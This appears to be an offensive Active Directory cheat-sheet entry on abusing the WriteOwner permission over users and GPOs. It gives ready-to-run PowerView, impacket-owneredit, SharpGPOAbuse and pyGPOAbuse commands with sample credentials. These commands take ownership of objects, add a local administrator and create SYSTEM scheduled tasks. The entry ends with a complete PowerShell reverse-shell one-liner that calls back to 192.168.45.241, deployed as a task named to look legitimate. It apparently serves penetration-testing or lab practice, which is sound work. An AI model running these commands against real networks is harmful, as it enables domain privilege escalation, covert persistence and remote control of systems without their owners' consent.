WriteOwner

Ownership give us the right to modify the object's permissions (DACL). Once we're owner, we can give ourselves FullControl, but we don’t automatically get it.

Over a User

This permission has the ability to modify the owner of the user, i.e, give the Owns permission, which can then being used to modify object security descriptors, regardless of permissions on the object's DACL.

Windows

# Create an object with the compromised account's credentials
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('marvel\x7331', $SecPassword)

# Set the ownership of the target object (PowerView)
Set-DomainObjectOwner -Credential $Cred -TargetIdentity "bob" -OwnerIdentity "x7331"

Linux

impacket-owneredit -action write -new-owner x7331 -target bob marvel.local/x7331:'Passw0rd123!'

Over a GPO

The Policy needs to be updated after the modifications: gpupdate /force.

For subsequent exploitation steps check WriteDACL.

Windows

From Windows SharpGPOAbuse can be used to add a user into the Administrators group.

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount x7331 --GPOName "Default Domain Policy"

Linux

pyGPOAbuse abuses this right by creating an immediate scheduled task as SYSTEM.

# Add an administrator user (john:H4x00r123..)
$ uv run pygpoabuse.py domain.local/x7331:Pass123! -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9"
[+] ScheduledTask TASK_69ed6112 created!

# Get a reverse shell
$ uv run pygpoabuse.py domain.local/x7331:Pass123! -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -powershell -command "\$client = New-Object System.Net.Sockets.TCPClient('192.168.45.241',80);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" -taskname "Completely Legit Task" -description "Dis is legit, pliz no delete" -user